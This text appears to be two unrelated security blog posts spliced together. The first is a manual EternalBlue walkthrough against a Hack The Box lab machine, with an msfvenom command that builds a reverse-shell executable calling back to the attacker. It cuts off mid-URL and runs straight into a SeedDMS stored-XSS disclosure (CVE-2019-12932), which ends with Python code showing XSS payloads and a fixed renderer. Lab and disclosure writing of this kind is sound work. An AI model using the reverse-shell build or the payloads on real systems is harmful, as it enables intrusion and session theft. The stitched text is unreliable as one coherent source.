Background: As part of my preparation for the OSCP, I came across a way to exploit EternalBlue (MS17-010) manually, without Metasploit, so I am compiling the steps here in case they are useful to others too. For the demonstration I am using the Blue machine from Hack The Box (HTB).

Exploit: Use searchsploit to find the EternalBlue exploit, or download it directly from Exploit-DB.

A few modifications and a couple of additional files are required. First we need to build the backdoor executable that will connect back to us with a shell (replace IP with the address of your attacking machine):

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > blue.exe

Next, a few changes need to be made to the script obtained from Exploit-DB or searchsploit.

If we read through the script, it tells us that it also needs an SMB helper module (mysmb.py) as a dependency for running it. Download that file from the reference link below and place it in the same directory as the exploit script, since the script imports it by module name.

Now start a listener on the port chosen above (4444) to catch the shell, and run the script with the target IP and the argument "netsvcs", which is the name of the named pipe the exploit connects to on the target.

Reference: https://github.com/worawit/MS17-010/blob/master/mysmb.py ht
Summary: Recently I received four CVEs for reporting security issues in an open-source document management system, SeedDMS. This particular post covers the exploit for CVE-2019-12932, a stored cross-site scripting (XSS) vulnerability that was present in SeedDMS 5.1.11; it has been patched, and 5.1.12 has been released to fix it.

Exploit: Log in to the application as a user and create a new folder, with your payload in the name parameter as shown. Now save it as shown. Finally, search for the folder name: the payload stored in the name is rendered unescaped in the search results, which is where the XSS executes.

I try to keep my posts precise and to the point, so in case you face any issue replicating this, feel free to comment.
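The pattern behind this bug, a value stored by one request and rendered unescaped by a later one, is easiest to see with the vulnerable and the hardened render side by side. The following is an added illustration for this post, not SeedDMS code (SeedDMS is written in PHP); the in-memory folder store, the templates and the function names are hypothetical, and the payloads are constructed to show both an HTML text-node context and an attribute context, the second of which fires without any angle brackets.

```python
"""Stored XSS via a folder name: vulnerable vs. hardened search-result rendering (added example)."""
import html

FOLDERS = []  # constructed in-memory store standing in for the application's database


def create_folder(name, parent='/'):
    # Storing the raw name is not the defect; the defect is rendering it later
    # without encoding it for the HTML context it lands in.
    FOLDERS.append({'name': name, 'parent': parent})
    return len(FOLDERS) - 1


def search_folders(query):
    return [f for f in FOLDERS if query.lower() in f['name'].lower()]


def render_results_vulnerable(query):
    # Interpolates stored names straight into a title attribute and a text node.
    rows = ''.join('<li title="%s">%s</li>' % (f['name'], f['name'])
                   for f in search_folders(query))
    return '<h2>Results for %s</h2><ul>%s</ul>' % (query, rows)


def render_results_fixed(query):
    # html.escape(quote=True) encodes & < > " ' so the name is inert in both contexts;
    # the query itself is escaped too, since echoing it raw would be a reflected XSS.
    def esc(s):
        return html.escape(s, quote=True)
    rows = ''.join('<li title="%s">%s</li>' % (esc(f['name']), esc(f['name']))
                   for f in search_folders(query))
    return '<h2>Results for %s</h2><ul>%s</ul>' % (esc(query), rows)


PAYLOADS = [  # constructed test payloads
    '<script>alert(document.domain)</script>',      # text-node context
    '" onmouseover="alert(document.domain)" x="',   # attribute context: breaks out of title=""
]


def demo():
    """Stores both payloads as folder names, then renders a search for them both ways."""
    FOLDERS.clear()
    for p in PAYLOADS:
        create_folder('reports' + p)
    return render_results_vulnerable('reports'), render_results_fixed('reports')


if __name__ == '__main__':
    vulnerable_page, fixed_page = demo()
    print(vulnerable_page)
    print(fixed_page)
```

Output encoding at render time is the fix because the same stored name may later be placed in other contexts (a JavaScript string, a URL) that need different encoders; filtering on input cannot anticipate all of them.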